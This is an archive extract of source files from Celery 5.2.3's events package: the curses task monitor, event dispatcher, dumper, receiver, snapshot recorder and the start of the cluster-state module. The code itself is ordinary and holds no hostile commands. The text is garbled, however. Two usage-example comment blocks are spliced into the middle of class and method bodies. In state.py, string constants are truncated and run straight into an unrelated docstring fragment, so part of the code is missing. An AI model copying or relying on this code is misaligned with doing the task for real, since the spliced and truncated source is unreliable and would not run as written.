return 0 for i, e in enumerate(self.tasks): if self.selected_task == e[0]: return i return 0 def move_selection_up(self): self.move_selection(-1) def move_selection_down(self): self.move_selection(1) def move_selection(self, direction=1): if not self.tasks: return pos = self.find_position() try: self.selected_task = self.tasks[pos + direction][0] except IndexError: self.selected_task = self.tasks[0][0] keyalias = {curses.KEY_DOWN: 'J', curses.KEY_UP: 'K', curses.KEY_ENTER: 'I'} def handle_keypress(self): try: key = self.win.getkey().upper() except Exception: # pylint: disable=broad-except return key = self.keyalias.get(key) or key handler = self.keymap.get(key) if handler is not None: handler() def alert(self, callback, title=None): self.win.erase() my, mx = self.win.getmaxyx() y = blank_line = count(2) if title: self.win.addstr(next(y), 3, title, curses.A_BOLD | curses.A_UNDERLINE) next(blank_line) callback(my, mx, next(y)) self.win.addstr(my - 1, 0, 'Press any key to continue...', curses.A_BOLD) self.win.refresh() while 1: try: return self.win.getkey().upper() except Exception: # pylint: disable=broad-except pass def selection_rate_limit(self): if not self.selected_task: return curses.beep() task = self.state.tasks[self.selected_task] if not task.name: return curses.beep() my, mx = self.win.getmaxyx() r = 'New rate limit: ' 
self.win.addstr(my - 2, 3, r, curses.A_BOLD | curses.A_UNDERLINE) self.win.addstr(my - 2, len(r) + 3, ' ' * (mx - len(r))) rlimit = self.readline(my - 2, 3 + len(r)) if rlimit: reply = self.app.control.rate_limit(task.name, rlimit.strip(), reply=True) self.alert_remote_control_reply(reply) def alert_remote_control_reply(self, reply): def callback(my, mx, xs): y = count(xs) if not reply: self.win.addstr( next(y), 3, 'No replies received in 1s deadline.', curses.A_BOLD + curses.color_pair(2), ) return for subreply in reply: curline = next(y) host, response = next(subreply.items()) host = f'{host}: ' self.win.addstr(curline, 3, host, curses.A_BOLD) attr = curses.A_NORMAL text = '' if 'error' in response: text = response['error'] attr |= curses.color_pair(2) elif 'ok' in response: text = response['ok'] attr |= curses.color_pair(3) self.win.addstr(curline, 3 + len(host), text, attr) return self.alert(callback, 'Remote Control Command Replies') def readline(self, x, y): buffer = '' curses.echo() try: i = 0 while 1: ch = self.win.getch(x, y + i) if ch != -1: if ch in (10, curses.KEY_ENTER): # enter break if ch in (27,): buffer = '' break buffer += chr(ch) i += 1 finally: curses.noecho() return buffer def revoke_selection(self): if not self.selected_task: return curses.beep() reply = self.app.control.revoke(self.selected_task, reply=True) self.alert_remote_control_reply(reply) def selection_info(self): if not self.selected_task: return def alert_callback(mx, my, xs): my, mx = self.win.getmaxyx() y = count(xs) task = self.state.tasks[self.selected_task] info = task.info(extra=['state']) infoitems = [ ('args', info.pop('args', None)), ('kwargs', info.pop('kwargs', None)) ] + list(info.items()) for key, value in infoitems: if key is None: continue value = str(value) curline = next(y) keys = key + ': ' self.win.addstr(curline, 3, keys, curses.A_BOLD) wrapped = wrap(value, mx - 2) if len(wrapped) == 1: self.win.addstr( curline, len(keys) + 3, abbr(wrapped[0], self.screen_width - (len(keys) + 3))) else: for subline in wrapped: nexty = next(y) if nexty >= my - 1: subline = ' ' * 4 + '[...]' elif nexty >= my: break self.win.addstr( nexty, 3, abbr(' ' * 4 + subline, self.screen_width - 4), curses.A_NORMAL, ) return self.alert( alert_callback, f'Task details for {self.selected_task}', ) def selection_traceback(self): if not self.selected_task: return curses.beep() task = self.state.tasks[self.selected_task] if task.state not in states.EXCEPTION_STATES: return curses.beep() def alert_callback(my, mx, xs): y = count(xs) for line in task.traceback.split('\n'): self.win.addstr(next(y), 3, line) return self.alert( alert_callback, f'Task Exception Traceback for {self.selected_task}', ) def selection_result(self): if not self.selected_task: return def alert_callback(my, mx, xs): y = count(xs) task = self.state.tasks[self.selected_task] result = (getattr(task, 'result', None) or getattr(task, 'exception', None)) for line in wrap(result or '', mx - 2): self.win.addstr(next(y), 3, line) return self.alert( alert_callback, f'Task Result for {self.selected_task}', ) def display_task_row(self, lineno, task): state_color = self.state_colors.get(task.state) attr = curses.A_NORMAL if task.uuid == self.selected_task: attr = curses.A_STANDOUT timestamp = datetime.utcfromtimestamp( task.timestamp or time(), ) timef = timestamp.strftime('%H:%M:%S') hostname = task.worker.hostname if task.worker else '*NONE*' line = self.format_row(task.uuid, task.name, hostname, timef, task.state) self.win.addstr(lineno, LEFT_BORDER_OFFSET, 
line, attr) if state_color: self.win.addstr(lineno, len(line) - STATE_WIDTH + BORDER_SPACING - 1, task.state, state_color | attr) def draw(self): with self.lock: win = self.win self.handle_keypress() x = LEFT_BORDER_OFFSET y = blank_line = count(2) my, _ = win.getmaxyx() win.erase() win.bkgd(' ', curses.color_pair(1)) win.border() win.addstr(1, x, self.greet, curses.A_DIM | curses.color_pair(5)) next(blank_line) win.addstr(next(y), x, self.format_row('UUID', 'TASK', 'WORKER', 'TIME', 'STATE'), curses.A_BOLD | curses.A_UNDERLINE) tasks = self.tasks if tasks: for row, (_, task) in enumerate(tasks): if row > self.display_height: break if task.uuid: lineno = next(y) self.display_task_row(lineno, task) # -- Footer next(blank_line) win.hline(my - 6, x, curses.ACS_HLINE, self.screen_width - 4) # Selected Task Info if self.selected_task: win.addstr(my - 5, x, self.selected_str, curses.A_BOLD) info = 'Missing extended info' detail = '' try: selection = self.state.tasks[self.selected_task] except KeyError: pass else: info = selection.info() if 'runtime' in info: info['runtime'] = '{:.2f}'.format(info['runtime']) if 'result' in info: info['result'] = abbr(info['result'], 16) info = ' '.join( f'{key}={value}' for key, value in info.items() ) detail = '... -> key i' infowin = abbr(info, self.screen_width - len(self.selected_str) - 2, detail) win.addstr(my - 5, x + len(self.selected_str), infowin) # Make ellipsis bold if detail in infowin: detailpos = len(infowin) - len(detail) win.addstr(my - 5, x + len(self.selected_str) + detailpos, detail, curses.A_BOLD) else: win.addstr(my - 5, x, 'No task selected', curses.A_NORMAL) # Workers if self.workers: win.addstr(my - 4, x, self.online_str, curses.A_BOLD) win.addstr(my - 4, x + len(self.online_str), ', '.join(sorted(self.workers)), curses.A_NORMAL) else: win.addstr(my - 4, x, 'No workers discovered.') # Info win.addstr(my - 3, x, self.info_str, curses.A_BOLD) win.addstr( my - 3, x + len(self.info_str), STATUS_SCREEN.format( s=self.state, w_alive=len([w for w in self.state.workers.values() if w.alive]), w_all=len(self.state.workers), ), curses.A_DIM, ) # Help self.safe_add_str(my - 2, x, self.help_title, curses.A_BOLD) self.safe_add_str(my - 2, x + len(self.help_title), self.help, curses.A_DIM) win.refresh() def safe_add_str(self, y, x, string, *args, **kwargs): if x + len(string) > self.screen_width: string = string[:self.screen_width - x] self.win.addstr(y, x, string, *args, **kwargs) def init_screen(self): with self.lock: self.win = curses.initscr() self.win.nodelay(True) self.win.keypad(True) curses.start_color() curses.init_pair(1, self.foreground, self.background) # exception states curses.init_pair(2, curses.COLOR_RED, self.background) # successful state curses.init_pair(3, curses.COLOR_GREEN, self.background) # revoked state curses.init_pair(4, curses.COLOR_MAGENTA, self.background) # greeting curses.init_pair(5, curses.COLOR_BLUE, self.background) # started state curses.init_pair(6, curses.COLOR_YELLOW, self.foreground) self.state_colors = {states.SUCCESS: curses.color_pair(3), states.REVOKED: curses.color_pair(4), states.STARTED: curses.color_pair(6)} for state in states.EXCEPTION_STATES: self.state_colors[state] = curses.color_pair(2) curses.cbreak() def resetscreen(self): with self.lock: curses.nocbreak() self.win.keypad(False) curses.echo() curses.endwin() def nap(self): curses.napms(self.screen_delay) @property def tasks(self): return list(self.state.tasks_by_time(limit=self.limit)) @property def workers(self): return [hostname for hostname, w 
in self.state.workers.items() if w.alive] class DisplayThread(threading.Thread): # pragma: no cover def __init__(self, display): self.display = display self.shutdown = False super().__init__() def run(self): while not self.shutdown: self.display.draw() self.display.nap() def capture_events(app, state, display): # pragma: no cover def on_connection_error(exc, interval): print('Connection Error: {!r}. Retry in {}s.'.format( exc, interval), file=sys.stderr) while 1: print('-> evtop: starting capture...', file=sys.stderr) with app.connection_for_read() as conn: try: conn.ensure_connection(on_connection_error, app.conf.broker_connection_max_retries) recv = app.events.Receiver(conn, handlers={'*': state.event}) display.resetscreen() display.init_screen() recv.capture() except conn.connection_errors + conn.channel_errors as exc: print(f'Connection lost: {exc!r}', file=sys.stderr) def evtop(app=None): # pragma: no cover """Start curses monitor.""" app = app_or_default(app) state = app.events.State() display = CursesMonitor(state, app) display.init_screen() refresher = DisplayThread(display) refresher.start() try: capture_events(app, state, display) except Exception: refresher.shutdown = True refresher.join() display.resetscreen() raise except (KeyboardInterrupt, SystemExit): refresher.shutdown = True refresher.join() display.resetscreen() if __name__ == '__main__': # pragma: no cover evtop() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/dispatcher.py0000664000175000017500000002143300000000000020167 0ustar00asifasif00000000000000"""Event dispatcher sends events.""" import os import threading import time from collections import defaultdict, deque from kombu import Producer from celery.app import app_or_default from celery.utils.nodenames import anon_nodename from celery.utils.time import utcoffset from .event import Event, get_exchange, group_from __all__ = ('EventDispatcher',) class EventDispatcher: """Dispatches event messages. Arguments: connection (kombu.Connection): Connection to the broker. hostname (str): Hostname to identify ourselves as, by default uses the hostname returned by :func:`~celery.utils.anon_nodename`. groups (Sequence[str]): List of groups to send events for. :meth:`send` will ignore send requests to groups not in this list. If this is :const:`None`, all events will be sent. Example groups include ``"task"`` and ``"worker"``. enabled (bool): Set to :const:`False` to not actually publish any events, making :meth:`send` a no-op. channel (kombu.Channel): Can be used instead of `connection` to specify an exact channel to use when sending events. buffer_while_offline (bool): If enabled events will be buffered while the connection is down. :meth:`flush` must be called as soon as the connection is re-established. Note: You need to :meth:`close` this after use. """ DISABLED_TRANSPORTS = {'sql'} app = None # set of callbacks to be called when :meth:`enabled`. on_enabled = None # set of callbacks to be called when :meth:`disabled`. 
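# Example (a minimal sketch, not part of this module): the same capture
# pattern as capture_events()/evtop() above, but feeding events into an
# app.events.State() without the curses UI.  The app name and broker URL
# are placeholders.
from celery import Celery

app = Celery('monitor', broker='amqp://')           # assumed broker URL
state = app.events.State()

def on_task_succeeded(event):
    state.event(event)                              # keep cluster state updated
    task = state.tasks.get(event.get('uuid'))
    if task is not None:
        print(f'{task.name}[{task.uuid}] -> {task.state}')

with app.connection_for_read() as connection:
    recv = app.events.Receiver(connection, handlers={
        'task-succeeded': on_task_succeeded,
        '*': state.event,                           # catch-all, as in capture_events()
    })
    recv.capture(limit=None, timeout=None, wakeup=True)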
on_disabled = None def __init__(self, connection=None, hostname=None, enabled=True, channel=None, buffer_while_offline=True, app=None, serializer=None, groups=None, delivery_mode=1, buffer_group=None, buffer_limit=24, on_send_buffered=None): self.app = app_or_default(app or self.app) self.connection = connection self.channel = channel self.hostname = hostname or anon_nodename() self.buffer_while_offline = buffer_while_offline self.buffer_group = buffer_group or frozenset() self.buffer_limit = buffer_limit self.on_send_buffered = on_send_buffered self._group_buffer = defaultdict(list) self.mutex = threading.Lock() self.producer = None self._outbound_buffer = deque() self.serializer = serializer or self.app.conf.event_serializer self.on_enabled = set() self.on_disabled = set() self.groups = set(groups or []) self.tzoffset = [-time.timezone, -time.altzone] self.clock = self.app.clock self.delivery_mode = delivery_mode if not connection and channel: self.connection = channel.connection.client self.enabled = enabled conninfo = self.connection or self.app.connection_for_write() self.exchange = get_exchange(conninfo, name=self.app.conf.event_exchange) if conninfo.transport.driver_type in self.DISABLED_TRANSPORTS: self.enabled = False if self.enabled: self.enable() self.headers = {'hostname': self.hostname} self.pid = os.getpid() def __enter__(self): return self def __exit__(self, *exc_info): self.close() def enable(self): self.producer = Producer(self.channel or self.connection, exchange=self.exchange, serializer=self.serializer, auto_declare=False) self.enabled = True for callback in self.on_enabled: callback() def disable(self): if self.enabled: self.enabled = False self.close() for callback in self.on_disabled: callback() def publish(self, type, fields, producer, blind=False, Event=Event, **kwargs): """Publish event using custom :class:`~kombu.Producer`. Arguments: type (str): Event type name, with group separated by dash (`-`). fields: Dictionary of event fields, must be json serializable. producer (kombu.Producer): Producer instance to use: only the ``publish`` method will be called. retry (bool): Retry in the event of connection failure. retry_policy (Mapping): Map of custom retry policy options. See :meth:`~kombu.Connection.ensure`. blind (bool): Don't set logical clock value (also don't forward the internal logical clock). Event (Callable): Event type used to create event. Defaults to :func:`Event`. utcoffset (Callable): Function returning the current utc offset in hours. """ clock = None if blind else self.clock.forward() event = Event(type, hostname=self.hostname, utcoffset=utcoffset(), pid=self.pid, clock=clock, **fields) with self.mutex: return self._publish(event, producer, routing_key=type.replace('-', '.'), **kwargs) def _publish(self, event, producer, routing_key, retry=False, retry_policy=None, utcoffset=utcoffset): exchange = self.exchange try: producer.publish( event, routing_key=routing_key, exchange=exchange.name, retry=retry, retry_policy=retry_policy, declare=[exchange], serializer=self.serializer, headers=self.headers, delivery_mode=self.delivery_mode, ) except Exception as exc: # pylint: disable=broad-except if not self.buffer_while_offline: raise self._outbound_buffer.append((event, routing_key, exc)) def send(self, type, blind=False, utcoffset=utcoffset, retry=False, retry_policy=None, Event=Event, **fields): """Send event. Arguments: type (str): Event type name, with group separated by dash (`-`). retry (bool): Retry in the event of connection failure. 
retry_policy (Mapping): Map of custom retry policy options. See :meth:`~kombu.Connection.ensure`. blind (bool): Don't set logical clock value (also don't forward the internal logical clock). Event (Callable): Event type used to create event, defaults to :func:`Event`. utcoffset (Callable): Function returning the current utc offset in hours. **fields (Any): Event fields -- must be json serializable. """ if self.enabled: groups, group = self.groups, group_from(type) if groups and group not in groups: return if group in self.buffer_group: clock = self.clock.forward() event = Event(type, hostname=self.hostname, utcoffset=utcoffset(), pid=self.pid, clock=clock, **fields) buf = self._group_buffer[group] buf.append(event) if len(buf) >= self.buffer_limit: self.flush() elif self.on_send_buffered: self.on_send_buffered() else: return self.publish(type, fields, self.producer, blind=blind, Event=Event, retry=retry, retry_policy=retry_policy) def flush(self, errors=True, groups=True): """Flush the outbound buffer.""" if errors: buf = list(self._outbound_buffer) try: with self.mutex: for event, routing_key, _ in buf: self._publish(event, self.producer, routing_key) finally: self._outbound_buffer.clear() if groups: with self.mutex: for group, events in self._group_buffer.items(): self._publish(events, self.producer, '%s.multi' % group) events[:] = [] # list.clear def extend_buffer(self, other): """Copy the outbound buffer of another instance.""" self._outbound_buffer.extend(other._outbound_buffer) def close(self): """Close the event dispatcher.""" self.mutex.locked() and self.mutex.release() self.producer = None def _get_publisher(self): return self.producer def _set_publisher(self, producer): self.producer = producer publisher = property(_get_publisher, _set_publisher) # XXX compat ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/dumper.py0000664000175000017500000000605400000000000017337 0ustar00asifasif00000000000000"""Utility to dump events to screen. This is a simple program that dumps events to the console as they happen. Think of it like a `tcpdump` for Celery events. """ import sys from datetime import datetime from celery.app import app_or_default from celery.utils.functional import LRUCache from celery.utils.time import humanize_seconds __all__ = ('Dumper', 'evdump') TASK_NAMES = LRUCache(limit=0xFFF) HUMAN_TYPES = { 'worker-offline': 'shutdown', 'worker-online': 'started', 'worker-heartbeat': 'heartbeat', } CONNECTION_ERROR = """\ -> Cannot connect to %s: %s. Trying again %s """ def humanize_type(type): try: return HUMAN_TYPES[type.lower()] except KeyError: return type.lower().replace('-', ' ') class Dumper: """Monitor events.""" def __init__(self, out=sys.stdout): self.out = out def say(self, msg): print(msg, file=self.out) # need to flush so that output can be piped.
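# Example (a minimal sketch under assumed names): publishing a custom event
# with the EventDispatcher defined above.  'myapp', the broker URL and the
# 'task-progress' event type are placeholders.
from celery import Celery, uuid

app = Celery('myapp', broker='amqp://')             # assumed broker URL

with app.connection_for_write() as connection:
    with app.events.Dispatcher(connection, enabled=True) as dispatcher:
        # group_from('task-progress') == 'task', so the event is dropped
        # unless the 'task' group is enabled (groups=None means all groups).
        dispatcher.send('task-progress', uuid=uuid(), progress=0.5)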
try: self.out.flush() except AttributeError: # pragma: no cover pass def on_event(self, ev): timestamp = datetime.utcfromtimestamp(ev.pop('timestamp')) type = ev.pop('type').lower() hostname = ev.pop('hostname') if type.startswith('task-'): uuid = ev.pop('uuid') if type in ('task-received', 'task-sent'): task = TASK_NAMES[uuid] = '{}({}) args={} kwargs={}' \ .format(ev.pop('name'), uuid, ev.pop('args'), ev.pop('kwargs')) else: task = TASK_NAMES.get(uuid, '') return self.format_task_event(hostname, timestamp, type, task, ev) fields = ', '.join( f'{key}={ev[key]}' for key in sorted(ev) ) sep = fields and ':' or '' self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {fields}') def format_task_event(self, hostname, timestamp, type, task, event): fields = ', '.join( f'{key}={event[key]}' for key in sorted(event) ) sep = fields and ':' or '' self.say(f'{hostname} [{timestamp}] {humanize_type(type)}{sep} {task} {fields}') def evdump(app=None, out=sys.stdout): """Start event dump.""" app = app_or_default(app) dumper = Dumper(out=out) dumper.say('-> evdump: starting capture...') conn = app.connection_for_read().clone() def _error_handler(exc, interval): dumper.say(CONNECTION_ERROR % ( conn.as_uri(), exc, humanize_seconds(interval, 'in', ' ') )) while 1: try: conn.ensure_connection(_error_handler) recv = app.events.Receiver(conn, handlers={'*': dumper.on_event}) recv.capture() except (KeyboardInterrupt, SystemExit): return conn and conn.close() except conn.connection_errors + conn.channel_errors: dumper.say('-> Connection lost, attempting reconnect') if __name__ == '__main__': # pragma: no cover evdump() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/event.py0000664000175000017500000000331000000000000017154 0ustar00asifasif00000000000000"""Creating events, and event exchange definition.""" import time from copy import copy from kombu import Exchange __all__ = ( 'Event', 'event_exchange', 'get_exchange', 'group_from', ) EVENT_EXCHANGE_NAME = 'celeryev' #: Exchange used to send events on. #: Note: Use :func:`get_exchange` instead, as the type of #: exchange will vary depending on the broker connection. event_exchange = Exchange(EVENT_EXCHANGE_NAME, type='topic') def Event(type, _fields=None, __dict__=dict, __now__=time.time, **fields): """Create an event. Notes: An event is simply a dictionary: the only required field is ``type``. A ``timestamp`` field will be set to the current time if not provided. """ event = __dict__(_fields, **fields) if _fields else fields if 'timestamp' not in event: event.update(timestamp=__now__(), type=type) else: event['type'] = type return event def group_from(type): """Get the group part of an event type name. Example: >>> group_from('task-sent') 'task' >>> group_from('custom-my-event') 'custom' """ return type.split('-', 1)[0] def get_exchange(conn, name=EVENT_EXCHANGE_NAME): """Get exchange used for sending events. Arguments: conn (kombu.Connection): Connection used for sending/receiving events. name (str): Name of the exchange. Default is ``celeryev``. Note: The event type changes if Redis is used as the transport (from topic -> fanout). 
""" ex = copy(event_exchange) if conn.transport.driver_type == 'redis': # quick hack for Issue #436 ex.type = 'fanout' if name != ex.name: ex.name = name return ex ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/receiver.py0000664000175000017500000001160600000000000017646 0ustar00asifasif00000000000000"""Event receiver implementation.""" import time from operator import itemgetter from kombu import Queue from kombu.connection import maybe_channel from kombu.mixins import ConsumerMixin from celery import uuid from celery.app import app_or_default from celery.utils.time import adjust_timestamp from .event import get_exchange __all__ = ('EventReceiver',) CLIENT_CLOCK_SKEW = -1 _TZGETTER = itemgetter('utcoffset', 'timestamp') class EventReceiver(ConsumerMixin): """Capture events. Arguments: connection (kombu.Connection): Connection to the broker. handlers (Mapping[Callable]): Event handlers. This is a map of event type names and their handlers. The special handler `"*"` captures all events that don't have a handler. """ app = None def __init__(self, channel, handlers=None, routing_key='#', node_id=None, app=None, queue_prefix=None, accept=None, queue_ttl=None, queue_expires=None): self.app = app_or_default(app or self.app) self.channel = maybe_channel(channel) self.handlers = {} if handlers is None else handlers self.routing_key = routing_key self.node_id = node_id or uuid() self.queue_prefix = queue_prefix or self.app.conf.event_queue_prefix self.exchange = get_exchange( self.connection or self.app.connection_for_write(), name=self.app.conf.event_exchange) if queue_ttl is None: queue_ttl = self.app.conf.event_queue_ttl if queue_expires is None: queue_expires = self.app.conf.event_queue_expires self.queue = Queue( '.'.join([self.queue_prefix, self.node_id]), exchange=self.exchange, routing_key=self.routing_key, auto_delete=True, durable=False, message_ttl=queue_ttl, expires=queue_expires, ) self.clock = self.app.clock self.adjust_clock = self.clock.adjust self.forward_clock = self.clock.forward if accept is None: accept = {self.app.conf.event_serializer, 'json'} self.accept = accept def process(self, type, event): """Process event by dispatching to configured handler.""" handler = self.handlers.get(type) or self.handlers.get('*') handler and handler(event) def get_consumers(self, Consumer, channel): return [Consumer(queues=[self.queue], callbacks=[self._receive], no_ack=True, accept=self.accept)] def on_consume_ready(self, connection, channel, consumers, wakeup=True, **kwargs): if wakeup: self.wakeup_workers(channel=channel) def itercapture(self, limit=None, timeout=None, wakeup=True): return self.consume(limit=limit, timeout=timeout, wakeup=wakeup) def capture(self, limit=None, timeout=None, wakeup=True): """Open up a consumer capturing events. This has to run in the main process, and it will never stop unless :attr:`EventDispatcher.should_stop` is set to True, or forced via :exc:`KeyboardInterrupt` or :exc:`SystemExit`. 
""" for _ in self.consume(limit=limit, timeout=timeout, wakeup=wakeup): pass def wakeup_workers(self, channel=None): self.app.control.broadcast('heartbeat', connection=self.connection, channel=channel) def event_from_message(self, body, localize=True, now=time.time, tzfields=_TZGETTER, adjust_timestamp=adjust_timestamp, CLIENT_CLOCK_SKEW=CLIENT_CLOCK_SKEW): type = body['type'] if type == 'task-sent': # clients never sync so cannot use their clock value _c = body['clock'] = (self.clock.value or 1) + CLIENT_CLOCK_SKEW self.adjust_clock(_c) else: try: clock = body['clock'] except KeyError: body['clock'] = self.forward_clock() else: self.adjust_clock(clock) if localize: try: offset, timestamp = tzfields(body) except KeyError: pass else: body['timestamp'] = adjust_timestamp(timestamp, offset) body['local_received'] = now() return type, body def _receive(self, body, message, list=list, isinstance=isinstance): if isinstance(body, list): # celery 4.0+: List of events process, from_message = self.process, self.event_from_message [process(*from_message(event)) for event in body] else: self.process(*self.event_from_message(body)) @property def connection(self): return self.channel.connection.client if self.channel else None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/snapshot.py0000664000175000017500000000633600000000000017705 0ustar00asifasif00000000000000"""Periodically store events in a database. Consuming the events as a stream isn't always suitable so this module implements a system to take snapshots of the state of a cluster at regular intervals. There's a full implementation of this writing the snapshots to a database in :mod:`djcelery.snapshots` in the `django-celery` distribution. """ from kombu.utils.limits import TokenBucket from celery import platforms from celery.app import app_or_default from celery.utils.dispatch import Signal from celery.utils.imports import instantiate from celery.utils.log import get_logger from celery.utils.time import rate from celery.utils.timer2 import Timer __all__ = ('Polaroid', 'evcam') logger = get_logger('celery.evcam') class Polaroid: """Record event snapshots.""" timer = None shutter_signal = Signal(name='shutter_signal', providing_args={'state'}) cleanup_signal = Signal(name='cleanup_signal') clear_after = False _tref = None _ctref = None def __init__(self, state, freq=1.0, maxrate=None, cleanup_freq=3600.0, timer=None, app=None): self.app = app_or_default(app) self.state = state self.freq = freq self.cleanup_freq = cleanup_freq self.timer = timer or self.timer or Timer() self.logger = logger self.maxrate = maxrate and TokenBucket(rate(maxrate)) def install(self): self._tref = self.timer.call_repeatedly(self.freq, self.capture) self._ctref = self.timer.call_repeatedly( self.cleanup_freq, self.cleanup, ) def on_shutter(self, state): pass def on_cleanup(self): pass def cleanup(self): logger.debug('Cleanup: Running...') self.cleanup_signal.send(sender=self.state) self.on_cleanup() def shutter(self): if self.maxrate is None or self.maxrate.can_consume(): logger.debug('Shutter: %s', self.state) self.shutter_signal.send(sender=self.state) self.on_shutter(self.state) def capture(self): self.state.freeze_while(self.shutter, clear_after=self.clear_after) def cancel(self): if self._tref: self._tref() # flush all received events. 
self._tref.cancel() if self._ctref: self._ctref.cancel() def __enter__(self): self.install() return self def __exit__(self, *exc_info): self.cancel() def evcam(camera, freq=1.0, maxrate=None, loglevel=0, logfile=None, pidfile=None, timer=None, app=None, **kwargs): """Start snapshot recorder.""" app = app_or_default(app) if pidfile: platforms.create_pidlock(pidfile) app.log.setup_logging_subsystem(loglevel, logfile) print(f'-> evcam: Taking snapshots with {camera} (every {freq} secs.)') state = app.events.State() cam = instantiate(camera, state, app=app, freq=freq, maxrate=maxrate, timer=timer) cam.install() conn = app.connection_for_read() recv = app.events.Receiver(conn, handlers={'*': state.event}) try: try: recv.capture(limit=None) except KeyboardInterrupt: raise SystemExit finally: cam.cancel() conn.close() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/events/state.py0000664000175000017500000006222600000000000017166 0ustar00asifasif00000000000000"""In-memory representation of cluster state. This module implements a data-structure used to keep track of the state of a cluster of workers and the tasks it is working on (by consuming events). For every event consumed the state is updated, so the state represents the state of the cluster at the time of the last event. Snapshots (:mod:`celery.events.snapshot`) can be used to take "pictures" of this state at regular intervals to for example, store that in a database. """ import bisect import sys import threading from collections import defaultdict from collections.abc import Callable from datetime import datetime from decimal import Decimal from itertools import islice from operator import itemgetter from time import time from typing import Mapping from weakref import WeakSet, ref from kombu.clocks import timetuple from kombu.utils.objects import cached_property from celery import states from celery.utils.functional import LRUCache, memoize, pass1 from celery.utils.log import get_logger __all__ = ('Worker', 'Task', 'State', 'heartbeat_expires') # pylint: disable=redefined-outer-name # We cache globals and attribute lookups, so disable this warning. # pylint: disable=too-many-function-args # For some reason pylint thinks ._event is a method, when it's a property. #: Set if running PyPy PYPY = hasattr(sys, 'pypy_version_info') #: The window (in percentage) is added to the workers heartbeat #: frequency. If the time between updates exceeds this window, #: then the worker is considered to be offline. HEARTBEAT_EXPIRE_WINDOW = 200 #: Max drift between event timestamp and time of event received #: before we alert that clocks may be unsynchronized. HEARTBEAT_DRIFT_MAX = 16 DRIFT_WARNING = ( "Substantial drift from %s may mean clocks are out of sync. Current drift is " "%s seconds. [orig: %s recv: %s]" ) logger = get_logger(__name__) warn = logger.warning R_STATE = '' R_WORKER = '>> add_tasks = state.tasks_by_type['proj.tasks.add'] while still supporting the method call:: >>> add_tasks = list(state.tasks_by_type( ... 
'proj.tasks.add', reverse=True)) """ def __init__(self, fun, *args, **kwargs): self.fun = fun super().__init__(*args, **kwargs) def __call__(self, *args, **kwargs): return self.fun(*args, **kwargs) Callable.register(CallableDefaultdict) @memoize(maxsize=1000, keyfun=lambda a, _: a[0]) def _warn_drift(hostname, drift, local_received, timestamp): # we use memoize here so the warning is only logged once per hostname warn(DRIFT_WARNING, hostname, drift, datetime.fromtimestamp(local_received), datetime.fromtimestamp(timestamp)) def heartbeat_expires(timestamp, freq=60, expire_window=HEARTBEAT_EXPIRE_WINDOW, Decimal=Decimal, float=float, isinstance=isinstance): """Return time when heartbeat expires.""" # some json implementations returns decimal.Decimal objects, # which aren't compatible with float. freq = float(freq) if isinstance(freq, Decimal) else freq if isinstance(timestamp, Decimal): timestamp = float(timestamp) return timestamp + (freq * (expire_window / 1e2)) def _depickle_task(cls, fields): return cls(**fields) def with_unique_field(attr): def _decorate_cls(cls): def __eq__(this, other): if isinstance(other, this.__class__): return getattr(this, attr) == getattr(other, attr) return NotImplemented cls.__eq__ = __eq__ def __ne__(this, other): res = this.__eq__(other) return True if res is NotImplemented else not res cls.__ne__ = __ne__ def __hash__(this): return hash(getattr(this, attr)) cls.__hash__ = __hash__ return cls return _decorate_cls @with_unique_field('hostname') class Worker: """Worker State.""" heartbeat_max = 4 expire_window = HEARTBEAT_EXPIRE_WINDOW _fields = ('hostname', 'pid', 'freq', 'heartbeats', 'clock', 'active', 'processed', 'loadavg', 'sw_ident', 'sw_ver', 'sw_sys') if not PYPY: # pragma: no cover __slots__ = _fields + ('event', '__dict__', '__weakref__') def __init__(self, hostname=None, pid=None, freq=60, heartbeats=None, clock=0, active=None, processed=None, loadavg=None, sw_ident=None, sw_ver=None, sw_sys=None): self.hostname = hostname self.pid = pid self.freq = freq self.heartbeats = [] if heartbeats is None else heartbeats self.clock = clock or 0 self.active = active self.processed = processed self.loadavg = loadavg self.sw_ident = sw_ident self.sw_ver = sw_ver self.sw_sys = sw_sys self.event = self._create_event_handler() def __reduce__(self): return self.__class__, (self.hostname, self.pid, self.freq, self.heartbeats, self.clock, self.active, self.processed, self.loadavg, self.sw_ident, self.sw_ver, self.sw_sys) def _create_event_handler(self): _set = object.__setattr__ hbmax = self.heartbeat_max heartbeats = self.heartbeats hb_pop = self.heartbeats.pop hb_append = self.heartbeats.append def event(type_, timestamp=None, local_received=None, fields=None, max_drift=HEARTBEAT_DRIFT_MAX, abs=abs, int=int, insort=bisect.insort, len=len): fields = fields or {} for k, v in fields.items(): _set(self, k, v) if type_ == 'offline': heartbeats[:] = [] else: if not local_received or not timestamp: return drift = abs(int(local_received) - int(timestamp)) if drift > max_drift: _warn_drift(self.hostname, drift, local_received, timestamp) if local_received: # pragma: no cover hearts = len(heartbeats) if hearts > hbmax - 1: hb_pop(0) if hearts and local_received > heartbeats[-1]: hb_append(local_received) else: insort(heartbeats, local_received) return event def update(self, f, **kw): d = dict(f, **kw) if kw else f for k, v in d.items(): setattr(self, k, v) def __repr__(self): return R_WORKER.format(self) @property def status_string(self): return 'ONLINE' if self.alive else 
